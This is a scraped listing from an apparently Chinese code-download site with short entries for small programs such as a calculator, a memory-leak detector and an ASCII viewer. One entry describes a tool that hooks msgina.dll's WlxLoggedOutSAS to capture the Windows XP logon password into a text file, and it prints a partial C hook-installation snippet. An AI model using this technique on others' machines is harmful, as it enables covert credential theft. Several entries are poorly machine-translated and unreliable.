-
检测内存泄露的程序
检测内存泄露的程序-memory leakage detection procedures
- 2023-04-14 09:10:04下载
- 积分:1
-
呵呵,vb小程序,是个计算器
呵呵,vb小程序,是个计算器-Oh, vb small program is a calculator
- 2022-06-20 22:02:12下载
- 积分:1
-
Please read your package and describe it at least 40 bytes in English.
System w...
Please read your package and describe it at least 40 bytes in English.
System will automatically delete the directory of debug and release, so please do not put files on these two directory. -Please read your package and describe it at least 40 bytes in English.
System will automatically delete the directory of debug and release, so please do not put files on these two directory.Please read your package and describe it at least 40 bytes in English.
System will automatically delete the directory of debug and release, so please do not put files on these two directory.
- 2023-08-26 05:40:04下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
演示如何显示数状目录的组合框的小技巧
演示如何显示数状目录的组合框的小技巧-demonstration showed how few from the list of the small frame composition skills
- 2022-01-22 02:43:50下载
- 积分:1
-
Essential C++ 中文版+英文版 侯捷译
Essential C++ 中文版+英文版 侯捷译-Essential C++ Chinese version+ English translation Hou Jie
- 2023-01-15 19:55:03下载
- 积分:1
-
EEP
基于eEP的两阶段方法分类,自己还没看完,有需要的人可以看看,不知道咋样 -EEP-based two-stage method of classification, not their reading, those in need can see, I do not know咋样
- 2022-01-20 23:19:08下载
- 积分:1
-
获取字符对应ASCII码的小例子,可以查看中文的对应编码。
获取字符对应ASCII码的小例子,可以查看中文的对应编码。-Corresponding ASCII character code to obtain a small example, you can view the corresponding code in Chinese.
- 2022-01-25 16:50:20下载
- 积分:1
-
gerador卡磁,
应用背景gerador de cartao磁准试验电磁aplicativos在线欧离线关键技术gerador,cartao,卡,磁源,linguagem EM,Embarcadero Delphi XE2,XE5,XE7,嗯exemplo de gerador aleatorio BOM。
- 2022-01-26 04:38:48下载
- 积分:1
-
鼠标取词.rar
鼠标取词.rar-word from the mouse. Rar
- 2022-01-24 14:01:34下载
- 积分:1